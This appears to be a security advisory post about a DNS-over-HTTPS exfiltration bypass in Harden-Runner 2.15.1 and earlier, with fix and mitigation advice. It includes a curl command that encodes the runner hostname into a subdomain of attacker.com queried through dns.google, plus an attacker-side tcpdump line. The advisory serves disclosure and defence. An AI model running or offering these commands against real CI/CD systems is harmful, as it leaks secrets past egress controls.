Listen to this Post
The vulnerability exists in Harden-Runner versions 2.15.1 and below. It abuses DNS over HTTPS (DoH) to bypass egress-policy block rules. The agent filters outbound connections based on domains, allowing HTTPS traffic to trusted endpoints like dns.google. An attacker with code execution in a GitHub Actions workflow can encode stolen data (e.g., runner hostname, environment variables) into subdomains of a DoH query. The query is sent to a permitted DoH server, which forwards the DNS resolution request to an attacker‑controlled authoritative DNS server. Since the initial connection is to an allowed domain, Harden‑Runner’s filtering does not block it, effectively exfiltrating data without ever connecting directly to a blocked destination. The attacker retrieves the data from the DNS logs of their own server. The fix was released in version 2.16.0 by tightening domain‑based egress rules and blocking unapproved DoH resolvers.
Platform: Harden-Runner
Version: 2.15.1 and below
Vulnerability: DNS over HTTPS
Severity: Medium
date: March 24, 2026
Prediction: 2.16.0 release
What Undercode Say:
Simulate DoH exfiltration by encoding data in subdomain
DATA=$(hostname | base64 | tr -d '=' | tr '+/' '-_')
curl -H "Accept: application/dns-json" \
"https://dns.google/resolve?name=${DATA}.attacker.com&type=A"
Attacker-side DNS logs showing the queried subdomain
sudo tcpdump -i any -n port 53 | grep attacker.com
Exploit:
Attacker gains workflow execution. Encodes secrets or identifiers into DNS label. Sends DoH query to dns.google. Query reaches attacker’s nameserver. Data extracted from DNS logs.
Protection from this CVE
Update to Harden‑Runner 2.16.0 or later. Block all outbound DoH resolvers via egress policies. Use strict allowlists for external DNS. Monitor DNS traffic for anomalous subdomain lengths.
Impact
Data exfiltration despite egress‑block rules. Exposure of runner metadata, environment variables, or secrets. Compromised CI/CD pipelines without triggering network‑level alerts.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

